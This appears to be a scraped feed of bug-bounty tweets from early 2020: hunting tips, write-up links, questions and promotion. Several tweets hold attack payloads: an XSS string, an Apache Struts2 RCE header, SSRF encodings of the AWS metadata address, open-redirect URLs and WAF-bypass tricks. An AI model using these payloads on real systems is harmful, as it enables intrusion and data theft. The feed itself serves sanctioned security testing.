@YourNextBugTip


2020-03-05 08:42:38
0 While entering a highly secure building... [-GUARD-] ENTER THE PIN [-John-Wick-] Killed the GUARD (John Entered The Building) Building - An App Guard - A file John Wick - @kernel_rider Read Here https://t.co/vZIJNgGGSV #bugbountytips #bugbountytip #bugbounty
Rohit Soni
@rohit_ka_tweet


2020-03-05 08:15:42
0 Intercept HTTPS traffic of App 1. Decompile 2. Replace 'https' with 'http' in all smali files find . -type f -exec sed -i 's/https\:\/\//http\:\/\//g' {} + 3. Build 4. Redirect req. to 443 Proxy-Options-Edit-Request Handling Ref: @Hacker0x01 Interview of @_bagipro #bugbountytip
Shubham Sharma
@Shubham_pen


2020-03-05 03:47:23
3 When we say โ€œping,โ€ we often are just limiting its definition to checking whether a host is alive or not. @rajchandel #forensics #infosec #pentest #cybersecurity #linux #BugBountyTip #ping #ITSecurity #ThursdayMotivation #Investigacion https://t.co/oXcj7zCYPW
AkaaZaan
@AkaaZaan


2020-03-05 02:56:02
0 BugBounty Hunters How do you exploit .net deserialization without ysoserial tool? I need help? #bugbountytip
'--+-
@mohsink83789226


2020-03-04 20:51:43
1 Just find an API key leaking bug. API key store in variable (JS) file. What can I do with it. After reading J's file I notice website using API key variable 6 time. I don't have any idea. Anyone can help ?? #BugBounty @thedawgyg #BugBountyTip
Security Executions Code
@pwn0sec


2020-03-04 18:22:02
1 This made me laugh, but itโ€™s so true. Face with tears of joy - #redteam #bugbountytips #bugbountytip #penetrationtesting https://t.co/wLqIyPiPFH
Your Next Bug Tip
@YourNextBugTip


2020-03-04 17:31:45
6 How to make 20000$ when target have more than 1K report #bugbountytip Think out of the box A full detailed Writeup on how to approach your target from scratch and finding multiple vulnerabilities Awesome Article by @YoKoAcc #bugbountytips #bugbounty https://t.co/bpvJcP45YI
Sofiane Hamlaoui ๐Ÿ‡ฉ๐Ÿ‡ฟ
@S0fianeHamlaoui


2020-03-04 16:58:00
1 Jailbreak iPhone with a rooted Android with (checkra1n) #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/ajw4RKk8N4
CyberSecurityBot ๐Ÿค–
@CyberSecCare


2020-03-04 16:57:50
1 Jailbreak iPhone with a rooted Android with (checkra1n) #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/7UwKd8eMl4
AkaaZaan
@AkaaZaan


2020-03-04 16:18:20
0 How to use ysoserial on linux? Does it work on linux? #bugbountytip #bugbountytip
Kato Zum
@ZumKato


2020-03-04 16:18:09
0 Yay, I was awarded a $250 bounty on @Hacker0x01 ! https://t.co/JYuR4H8c2H #TogetherWeHitHarder #bugbountytips #bugbountytip
wwjy1f
@ddhkttmm


2020-03-04 16:04:11
0 Alway convert parameter to array you will get unexpected result, some times xss bypass Like, path=/abc to path["]=/abc #bugbountytip
'--+-
@mohsink83789226


2020-03-04 16:00:59
0 Website?path=text Response { "assertPaths":["text"],"metadata":{} } What to do๐Ÿค• @zseano @NahamSec #bugbountytip
Abhinav Gyawali
@SlikeGyawali


2020-03-04 14:43:07
1 Just found this gold mine! Got loads of amazing books useful of infosec! https://t.co/P6Z4VapVAY #infosec #bugbounty #bugbountytip
Hussein Daher
@HusseiN98D


2020-03-04 12:42:00
10 Time for a #BugBountyTip Download old version of mobile apps and search for secrets. Most of the time, when an APP is updated, devs might remove secrets and forget revoking them. Search for API tokens, AWS credentials, ... #bugbounty #bugbountytips #pentest #infosec
Nick || hunt4p1zza
@ngkogkos


2020-03-04 12:20:19
2 It's also always a good idea to keep an eye on Logger++/Flow for the requests Active Scanner (AS) produces (or other scanning plugins), sometimes you may see a 500 error which AS failed to exploit, but you may be able to get something out of it! #BugBounty #bugbountytip https://t.co/wMyrxZp2fp
Shubham Sharma
@Shubham_pen


2020-03-04 03:26:45
4 Here we are again coming back with one of very essential command i.e. โ€œPerlโ€. As we know Perl has itโ€™s significant in the era of programming language. @rajchandel @ubuntu #cybersecurity #linux #bugbountytip #perl #pentest #ITSecurity #WednesdayMotivation https://t.co/RuJrg2IBxo
ninetynine
@ninetyn1ne_


2020-03-03 16:59:39
0 Quick tip :- Try sending POST requests with an empty body. Sometimes servers respond with an ' xyz parameter not found ' error which may contain previously unknown parameters!! Happy hunting ;) #bugbounty #bugbountytip
Abugzlife
@abugzlife1


2020-03-03 15:53:56
2 Exploiting an SSRF: Trails and Tribulation - New post about the thought process of attacking and exploiting a set of functionality. Not a novel method but the trial & error process is the highlight. https://t.co/9Ag9RTx7Jf #bugbounty #bugbountytip #infosec
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-03 14:08:11
1 Instagram API endpoint (with acces_token?) #Bing Is this not risk to be exposed? Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/UCGLM75ugP
Rajesh Ranjan
@rajesh_ranjan4


2020-03-03 12:09:35
3 Here's a write-up on how I earned my first bounty! https://t.co/XyiRexInJm Thanks to @bejuveria_ for proofreading #bugbountytip #bugbounty #infosec #bugcrowd
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-03 11:07:06
1 Linux Commands To Remember - #Basics Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/ZaZGIx5f4S
RootRaZoR
@rootraz0r


2020-03-03 10:55:01
0 #bugbountytip #Hacking #Exploit New Exploit Shared http fuck :) https://t.co/Vg2e1PqXbc
HackDoor
@hackd00r


2020-03-03 06:14:01
0 Contact Us For Corporate Trainings on Cyber Security Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p Instagram - https://t.co/1YqKY0ZFK1 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining https://t.co/rFluc53uvN
Your Next Bug Tip
@YourNextBugTip


2020-03-03 04:29:35
6 #bugbounty Daily 2-3 hrs Recon -> RCE & Full Internal N/w Access - Gr8 Explanation of Hacker's MINDSET๐Ÿ”ฅ - Github & Google Recon Powerโšก A very long & detailed writeup about Multiple critical #vulnerabilities by @YoKoAcc https://t.co/hJFSkHnKVX #bugbountytips #bugbountytip
Secuna
@SecunaSecurity


2020-03-03 02:11:41
0 Directory Traversal or Path Traversal is a vulnerability that could allow an attacker to access restricted and confidential files and directory. https://t.co/C90xTTxkYB #DirectoryTraversal #BugBountyTip #Cybersecurity #SecurityFirst
Bug Bounty Village
@bugbountyvillag


2020-03-02 17:45:00
5 (7/7) API Security tip by @HivarekarPranav For any json/xml API endpoint, try to change extension to jsonp which may give you data in jsonp format. It can be easily stolen cross site. #bugbounty #bugbountytips #bugbountytip
Micah Smith
@MSDgtl


2020-03-02 17:00:07
0 US jails #Chinese Scientists. Zero-day Exploits in #WordPress Plug-ins. US Railroad Contractor #DataBreach **** #CyberSecurity #infosec #InformationSecurity #bugbountytip #technology https://t.co/zqQhT3ZCCC
INTIGRITI
@intigriti


2020-03-02 14:36:35
12 Finding internal domains was never so easy thanks to https://t.co/VS3AwIHKAC! Thanks for sharing this amazing tool with us, @ehsahil! #BugBountyTip #HackWithIntigriti https://t.co/VGKwdyY3GH
Bug Bounty Village
@bugbountyvillag


2020-03-02 13:30:00
6 Tip by @thedawgyg When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 #bugbountytip #bugbounty #bugbountytips
Your Next Bug Tip
@YourNextBugTip


2020-03-02 11:02:06
1 I think you people can collab with him and create awesome #bugbountyTOOLS together. #TogetherWeHitHarder #bugbounty #bugbountytip #bugboutnytips https://t.co/qMrRjBVL0m
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-02 05:16:40
3 Corporate Training on #SIEM ! ๐Ÿฅ‡๐Ÿ† #HappyClients Helping Setup SOC Team for our Client ๐Ÿ‘‡๐Ÿ‘‡ ๐Ÿ”ฅ Join Us ๐Ÿ”ฅ #Hackdoor #Swag #corporatetraining #cybersecurity #CyberSecurityTraining #hackers #infosec #bugbounty #bugbountytip https://t.co/Bc7TIPZuOh
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-01 23:25:00
1 i gonna create videos about hacking contain POC for vulnerable websites,is it OK to share this on twitter for educational purpose ONLY. #bugbountytip #hacking #Pentesting #BugBounty #redteam #infoec #CyberSecurity
bugbountytip
@a_l_e_r_t_1_


2020-03-01 18:03:56
3 Happy hacking guys :) #bugbountytips #bugbountytip #infosec #sharingisgood https://t.co/u9IzXWE6N0
ZishanAdThandar
@ZishanAdThandar


2020-03-01 17:15:44
0 temporary post.. trying xss on https://t.co/hkWbxZVTk1 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com'><svg onload=alert``><?script>alert(`1`)> #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-03-01 16:47:22
6 Finding Hidden IDORS #bugbountytips - Attention to details - Decompile Apps(Android/iOS) - RTF[JS] Bugs are simple,ย persistence is the key. [email protected] MUST READ https://t.co/Xk8OvJilwJ #bugbountytip #bugbounty
Bug Bounty Village
@bugbountyvillag


2020-03-01 15:30:00
3 (6/7) API Security tip by @HivarekarPranav Found an API endpoint used for uploading, change the upload file param to URL and test for SSRF. Many times it can lead you to full blown SSRF. #bugbounty #bugbountytips #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-03-01 13:30:00
5 Tip by @Paresh_parmar1 purchase paid version of product, list out all the endpoints which is only available for paid user. n try to play those endpoints in free version of product. see if u can use paid version's features in free version. #bugbounty #bugbountytips #bugbountytip
Yash sariya jain
@stylish_hacker_


2020-03-01 11:48:27
0 https://t.co/3wLsQ4s9Vh *root-me CTF Solution For bughunter* #bugbountytip #bugbountytips #hackers #rootme #owasp #lab #ctf
Yash sariya jain
@stylish_hacker_


2020-03-01 11:44:47
1 https://t.co/dyIUqiifZ9 Owaspp Bwapp Lab solution For Bug Hunter #bugbountytips #bugbountytip #bugbounty #hacker #owasp #bwapp
Yash sariya jain
@stylish_hacker_


2020-03-01 09:04:39
0 PortSwigger Websecurity Lab Solution Video Playlist https://t.co/4ijOOALdpH #portswigger #burpsuite #hacker #bugbountytips #BugBounty #bugbountytip #infosec #Hacking #bugbountyprotip
Your Next Bug Tip
@YourNextBugTip


2020-03-01 03:24:34
4 All CSRF Bypasses from all over the net. Last one is the most interested one (bypass XHTTPRequest check using flash), but not exploitable in 2020, It will teach you how to create you own way. Did I miss anything? #bugbountytips #bugbountytip #bugbounty https://t.co/f6VrZlivFz
Bug Bounty Village
@bugbountyvillag


2020-02-29 17:30:00
5 (5/7) How to test for XXE in the API? by @HivarekarPranav Change content-type in the request to `application/xml` and verify if the application is processing it. If it is processed then you can go on and test for XXE. #bugbounty #bugbountytips #bugbountytip
Anshuman Pattnaik
@anspattnaik


2020-02-29 16:25:38
1 #bugbountytip Is all ASN no are within the scope, if the program didn't mentioned in their policy? I mean will it be valid for submission or it will marked as N/A.
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-29 12:20:23
8 Pentest Tips and Tricks #1.pdf https://t.co/tviY9RRWBa Pentest Tips and Tricks #2.pdf https://t.co/3rstUe0yxB Bug-Bounty-Bookmarks.pdf https://t.co/Lgt3HtorQl android pentesting sheet .pdf: https://t.co/o7k0LLiuAn #bugbountytips #hacking #OSINT #pentest #bugbountytip #redteam
rinaki
@rinakikun


2020-02-29 10:08:15
0 So much truth in this one tweet. #BugBountyTip https://t.co/o7X7kXD94K
Bug Bounty Village
@bugbountyvillag


2020-02-29 06:26:00
6 Tip by @armaancrockroax inject bxss payloads in appstore/play storeโ€™s app reviews. Many times companies uses third party app review analysis apps. Payload can get trigger on the third party app which can give you access to some sensitive information. #bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-28 15:23:00
5 (4/7) API Security tip by @HivarekarPranav JSON API endpoints are vulnerable to CSRF, just set content-type to `text/plain` and see if it works. #bugbounty #bugbountytips #bugbountytip
Exploiting all - Hack to Learn
@osvaldo_hp


2020-02-28 15:10:08
5 tip to help you at pentest @YourNextBugTip #bugbountytip #BugBountyTips #BugBounty https://t.co/a29eVLxxtj
Nick || hunt4p1zza
@ngkogkos


2020-02-28 15:06:35
1 Always take PoC (screenshots, images) when performing attacks that may trigger later (BXSS, template injections). Example: you receive a promotional email months later that uses a vulnerable template. This will save time from trying to reproduce the issue.#bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-28 13:30:00
0 #bugbountytip by @prateek_0490 Got an SSRF? But app prevents trying to connect to localhost https://t.co/SBD0GwZWc0? DNS Pinning for the win, create, set subdomain, point it to 127.0.0.1>use remote red> <?php header("Location: https://t.co/mjBUtPZ6JL"); die(); ?> #BugBounty
Your Next Bug Tip
@YourNextBugTip


2020-02-28 09:02:47
2 Apache Struct2 RCE [2020] Payload: Content-Type: .multipart/form-data~%{#context[โ€œcom.opensymphony.xwork2.dispatcher.HttpServletResponseโ€].addHeader(โ€œNamehereโ€,4*4)} Hacked by @abhishake100 https://t.co/CnC05oreB1 #bugbountytips #bugbountytip #bugbounty
'--+-
@mohsink83789226


2020-02-28 06:22:34
0 When I use ' with cookie - response hidden. And when I use ' 'a , response showing..... I try ' sleep(10) 'a not working :( ' order by also now working. But when I use sqlmap, sqlmap response => target URL appears to have 17 column's in query?? Help๐Ÿ™‚ #BugBounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-28 00:51:09
1 Never Ask A #hacker to #hack FB and Insta Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/xeCP5xnmLr
TheEthicalKid
@kid_ethical


2020-02-28 00:08:49
3 @Bugcrowd New Dark Mode Looks great! #bugcrowd #bugbounty #hackerone #hack #xss #bugbountytip #bughunters #developers #xxe #ssrf #sqlinjection #programmers #python #ruby #hacks #hackers #ethicalhacking #mrrobot #whitehat #injections #security #vulnerability #exploitation https://t.co/PpRPbGkx3N
Steve Mcilwain
@steve_mcilwain


2020-02-27 22:17:17
0 Trim n characters from the end of a string: alias trim1="sed 's/.$//'" alias trim2="sed 's/..$//'" alias trim3="sed 's/...$//'" alias trim4="sed 's/....$//'" Use like: cat sub-domains.txt | httprobe -s -p https:443 | trim4 #bugbountytip #bugbountytips
Steve Mcilwain
@steve_mcilwain


2020-02-27 21:42:34
0 Not great for OPSEC, but sometimes I do this when running a lot of scans or a script on Kali (not as root) to skip some sudo's: echo "$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan" | sudo tee /etc/sudoers.d/$USER #BugBountyTips #bugbountytip #PenTest
Naategh
@Naategh_


2020-02-27 19:34:28
0 OMG! Why had I not seen this note-taking app before? -_- Use it to take notes while hunting, It supports markdown. https://t.co/KEz7x9LJt1 #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-27 15:45:00
4 (3/7) API Security tip by @HivarekarPranav Testing third party APIs, focus on studying and testing scope permissions instead of performing traditional privilege escalation testing. #bugbounty #bugbountytips #bugbountytip
Nguyen The Duc
@ducnt_


2020-02-27 15:07:41
0 Filed a duplicate with gr8 bug was found by @SecurityMB but can reopen it with a triaged issue. Really a excited moment. #bugbountytip https://t.co/iI1mSCfNLC
Bug Bounty Village
@bugbountyvillag


2020-02-27 13:30:00
5 Tip by @stokfredrik Got a big scope? Take screenshots with EyeWitness and sort them by file size to get the juicy stuff! #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-27 12:30:42
0 Open Redirect @Hacker0x01's Markdown Payload: [Go to https://t.co/8b66WBIgJW](https://t.co/gIHwGWmWq3%https://t.co/s71RUjUop3%[email protected]) $$500$$ Hacked By @shailesh4594 Read Here https://t.co/fuqPTOJYZ4 #bugbountytips #bugbountytip #bugbounty
Your Next Bug Tip
@YourNextBugTip


2020-02-27 12:19:57
4 Open redirect Payload: /login?next=Http:3627732462 3627732462 is decimal form of IP address of google.cox Hacked by @shailesh4594 $$200$$ https://t.co/X2JTcq0CgC #bugbountytips #bugbountytip #bugbounty
Abhishek ๐Ÿ•ต๏ธ
@abhishake100


2020-02-27 05:46:16
0 I just published RCE via Apache Struts2 - Still out there. #bugbounty #bug #bounty #bugbountytip https://t.co/y4tfDTZiRZ
Your Next Bug Tip
@YourNextBugTip


2020-02-27 04:57:25
0 Finally a perfect Write Up for #bugbountyBEGINEERS This is how @harrmahar Found his first P1, He shared a detailed write up. #bugbountyTip Sharp Your Axe Before Hitting the Tree Well done @harrmahar ๐Ÿ‘๐Ÿ‘๐Ÿ‘ https://t.co/XoHfy4azMN #bugbountytips #bugbounty
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-27 02:18:45
3 Never Ask A #hacker to #hack FB and Insta Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ObUCVhHOed
Noble Six
@NobleSiXSS


2020-02-26 22:30:00
1 Just released my first tool! It's a status code checker built in Golang that supports concurrency Check it out here https://t.co/jzT3rMxj40 #bugbountytip #bugbountytips #infosec #bugbounty
Nouroz Gaming
@NourozGaming


2020-02-26 19:22:29
0 When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
Bug Bounty Village
@bugbountyvillag


2020-02-26 16:30:00
3 (2/7) API Security tip by @HivarekarPranav API endpoints are mostly not secure against cross site stealing bugs which includes CSRF and CORS. So, test it when you start. #bugbounty #bugbountytips #bugbountytip
Samet SAHIN
@sametsahinnet


2020-02-26 15:20:19
1 #bugbountytip #bugbountytips Send empty values for each required parameters. Maybe they are not required, right? @ozgur_bbh https://t.co/XWRs90zYNJ
baluz๐Ÿ”ฅ
@oyenom


2020-02-26 15:08:17
2 Some new blogs published #bugbountytip #bugbounty https://t.co/NWBDWv4xTI https://t.co/ul2npeoVHP
x1m
@x1m_martijn


2020-02-26 14:52:32
0 Golden techniques to bypass host validations in Android apps https://t.co/8LQRI7V8tJ by @_bagipro #AndroidHackingMonth #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-26 13:45:00
5 Tip by @RahulKankrale Scheme verification bypass using Line Feed & Parameter pollution if only https/http schemes allowed then using %0A & parameter pollution it is possible to bypass this restriction. scheme://route?uri=http%0A&uri=protected_scheme://auth #bugbountytip
Bug Spotter ๐Ÿ”
@BugSpotter


2020-02-26 13:26:49
0 " What is the best tool for hacking? " They ask. ' Mind ' - I reply #infosec #bugbountytips #CyberSecurity #bugbountytip
Dujunayan
@dujunayan


2020-02-26 12:40:09
0 #bugbountytip Share your knowledge before you die, #coronaโ€™s coming ๐Ÿ˜.
bugbountytip
@a_l_e_r_t_1_


2020-02-26 08:37:16
0 Anyone have incapsula waf bypass payload for xss or lfi? #bugbountytips #bugbountytip #infosec
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-26 07:24:27
1 Should I create videos about hacking? #Hacking #bugbountytip #Pentesting #redteam
darkmage
@therealdarkmage


2020-02-26 07:18:38
3 I successfully got something accepted to a program but it was sadly a non-paying vulnerability :( I felt like it should be worth more than points but hopefully next one will be much bigger! #bugbounty #hacking #bugbountytip #bugbountytips https://t.co/NyV33M1yLx
AkaaZaan
@AkaaZaan


2020-02-26 05:56:44
0 Yesterday, there was a .jsp extension related #bugbountytip by someone. Can someone tag me in that, I cannot find it.
Abhijeet Jain
@seecure963


2020-02-25 17:41:00
3 Best way to find external bug bounty programs is to use this google dork "intext: we take security seriously reward" #bugbountytip #bugbounty
Bug Bounty Village
@bugbountyvillag


2020-02-25 16:30:00
2 (1/7) How to find high impact vulnerabilities in the API? by @HivarekarPranav Search for hidden endpoints which are implemented on the API but are not used anywhere. Such endpoints can be found in JS files, reversing mobile apps, etc. #bugbounty #bugbountytips #bugbountytip
Sofiane Hamlaoui
@S0fianeHamlaoui


2020-02-25 14:41:04
5 Lockdoor Framework : A Penetration Testing Framework, has now 356 โญ๏ธ and 102 Fork on github. Big thanks to everyone for the support and the share ๐Ÿ™๐Ÿป #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/uSVX7JcTEl
fuzzsqlbOf
@fuzzsqlbof


2020-02-25 10:55:11
0 SQL Injection Writeup https://t.co/6yqfR40Lct #bugbountytips #togetherwehitharder #bugbountytip #CyberSecurity #hackerone
Bug Bounty Village
@bugbountyvillag


2020-02-25 10:48:13
6 #bugbountytip Command Injection WAF bypass trick:- Using empty shell variables, like ${something} and ${doesn'texist}. Thanks to @Voulnet #bugbounties #infosec #security #bounty #hacking https://t.co/jMt6j4fV0P
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-25 09:14:33
0 Tuesdays Be Like - Hall Of Fame from ISSUU - Reported Leaking API Credentials - Fixed ! ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 LinkedIn - https://t.co/nhF4SNqtBF Instagram - https://t.co/Q0OxMhsE7n Youtube - https://t.co/42lWP1m84s #BugBounty #BugBountyTip https://t.co/SJgsrNCjpi
Ajay Gautam
@evilboyajay


2020-02-25 03:33:08
2 If you find html injection then add clickjacking script as payload for the same site you are testing. If they have prevented clickjacking but the x-frame-header is same-origin then you can successfully get clickjacking vulnerability. #bugbountytip
BUGemot
@bugemot


2020-02-24 22:11:44
0 Multiple Critical Vulnerabilities discovered in Open-Xchange https://t.co/uP4ZhTv6Ta CVE-2019-18846/CVE-2019-9853 - https://t.co/gAO6zM7D7O #bugbountytip #BugBounty #CVE #CyberSecurity
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-02-24 20:46:10
2 Information Gathering with Google.pdf https://t.co/mOzevBFm30 DNS Enumeration.pdf https://t.co/1BAccMMXRS Vulnerability Research Engineering Bookmarks Collection.txt https://t.co/aRQcnazzlG Escalating SSRF to RCE.pdf https://t.co/yUqgQNel5N #bugbountytip #hacking #pentest #OSINT
Steve Mcilwain
@steve_mcilwain


2020-02-24 18:03:46
3 Tired of manually tuning scope in Burp Suite? I just tried rescope by @root4loot. It let's you point to the URL of a bug bounty program and generate scope for Burp or Zap. https://t.co/9SdUJLbqEE #BugBounty #bugbountytips #bugbountytip
Noman | ู†ุนู…ุงู† | เคจเฅ‹เคฎเคพเคจ
@nomanAli181


2020-02-24 17:24:32
0 Few months back this portal first came on a diff subdomain, But I was done for the day and bookmarked it to analyze it next day but that host went down. Last week it came back on a new host and this time I was ready :) #bugbountytip monitor the targets you know/love #bugbounty https://t.co/7IIC0EXlIt
Pranav Hivarekar
@HivarekarPranav


2020-02-24 16:30:00
11 GraphQL Security Testing: Resources to learn- - https://t.co/tMqWzRtxLE - https://t.co/yvqDh89goj Research- https://t.co/1LSUUDHEnh Examples of bugs: - https://t.co/0yOBmHudTt - https://t.co/Ts6hgFJlxr - https://t.co/vNaECJNxa3 #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-24 15:49:27
2 SIM Api key leak found by @KHIZER_JAVED47 Tip: While do recon, always extract mobile App and read the files, some devs forgot API KEY, PASSWORD and other juicy stuff in it. (3 min read) https://t.co/ijrYjZOKT2 #bugbountytips #bugbountytip #bugbounty
baluz๐Ÿ”ฅ
@oyenom


2020-02-24 15:20:51
3 Bypass android ssl pinning apk No frida needed...... #bugbountytip #bugbounty https://t.co/FBgYMcjRws
baluz๐Ÿ”ฅ
@oyenom


2020-02-24 15:17:14
0 My blog no 3 bypassing ssl pinning of android apk #bugbounty #bugbountytip https://t.co/XYeM6zw6pN
baluz๐Ÿ”ฅ
@oyenom


2020-02-24 12:26:35
0 Accessing your phone through ssh https://t.co/a79A90Iz1D #bugbountytip #bugbounty
Shubham Arya
@iam_shubhamarya


2020-02-23 18:52:08
1 My first blog :) โ€œHack The Box Methodologyโ€ by Shubham Arya https://t.co/zmS4pzH0rv . . . . #Hacking #bugbountytip #bugbountytips #Hackers #Hackthebox #CyberSecurity #Python #programming #code
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 18:09:20
4 SQLi Without Quotes (MariaDB) https://t.co/W7bdONVllL Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 17:26:54
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ICR7fEC3i8
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 14:05:03
1 ๐ŸคฃFollow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/tNflpuxYZq
Your Next Bug Tip
@YourNextBugTip


2020-02-23 12:07:35
5 Badoo Acc Takeover - Create 2 Accs & link 2 diff fb acc in each of them - As attacker import pics via fb & copy the link - Send the link to victim - Login via attacker's fb in victim's acc Hacked by @rootxharsh https://t.co/08VkMXaDbS #bugbountytips #bugbountytip #bugbounty
siLLyDaDDy
@sillydadddy


2020-02-23 11:13:57
0 #bugbountytip I am very very new to bug bounty . But my experience in other fields have taught me "how to learn " I see , my brothers/friends just taking a course and trying hard , really hard on bug bounties If your axe is blunt no matter how hard u hit u cannot cut a tree
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 07:04:52
0 #Swag For Hackers and Bug Hunters Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8tJRnZ8O2U
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-02-23 04:53:59
1 #SpiderMan vs #HackerMan Follow Us for Bug Bounty Tips #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8MHcRUYdOH
Your Next Bug Tip
@YourNextBugTip


2020-02-23 03:40:15
5 Click Reset Pwd N times U will get N links If first link still works Then issue as much as links possible Bruteforcing Token will be easy If there is no rate limit then B000M Write Up by @LnaziJubaerSec https://t.co/VcExv4xer1 #bugbountytips #bugbountytip #bugbounty
Security Executions Code
@pwn0sec


2020-02-23 00:38:44
1 Googleapis /auth/admin/* #bugbountytip #bugbountytips #google https://t.co/VdADtMDFwN
Steve Mcilwain
@steve_mcilwain


2020-02-22 17:11:42
0 I store recon data on my VPS, then sync it to my laptop with sshfs and rsync (in WSL) sshfs <user>@<rhost>:~/data /mnt/data rsync -avu /mnt/data /mnt/d/recon/data fusermount -u /mnt/data #PenTest #BugBounty #bugbountytip #bugbountytips #OSINT
ghostlulz
@ghostlulz1337


2020-02-22 16:37:00
